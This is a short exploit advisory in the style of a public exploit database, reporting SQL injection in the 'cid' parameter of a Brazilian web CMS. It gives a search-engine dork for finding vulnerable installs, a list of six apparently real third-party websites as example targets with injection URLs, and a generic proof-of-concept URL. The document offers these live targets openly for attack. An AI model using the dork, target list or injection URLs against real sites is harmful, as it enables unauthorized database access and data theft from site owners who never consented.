##################################################
# Exploit Title: Vetor CMS SQL injection
# Vendor: http://www.vetor.net/
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
#Twitter: @xdarkston3x
# Category: webapps
# Google dork: intext:"Desenvolvido por Vetor Design" inurl:php?cid='
# Example Sites :
http://mimosbaby.net/produtos.php?cid=%27
http://www.arlenarquitetura.com/catProjetos.php?cid=%27
http://www.bompel.com.br/produtos_categoria.php?cid=%27
http://www.aquiagora.net/cidade.php?cid=%27
http://mbdecoracoes.net/catProdutos.php?cid=%27
http://www.agricolahorizonte.com.br/saude/index.php?cid=%27
##################################################
[~]Exploit/p0c :
http://www.site.com/x.php?cid=[sqli]
##################################################
Found and published in 2011/06/, the Webapps was copied by some fucking lammers
Link to publication: http://xdarkstonex.blogspot.com/2011/06/cms-brasileno-vulnerable.html
Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng]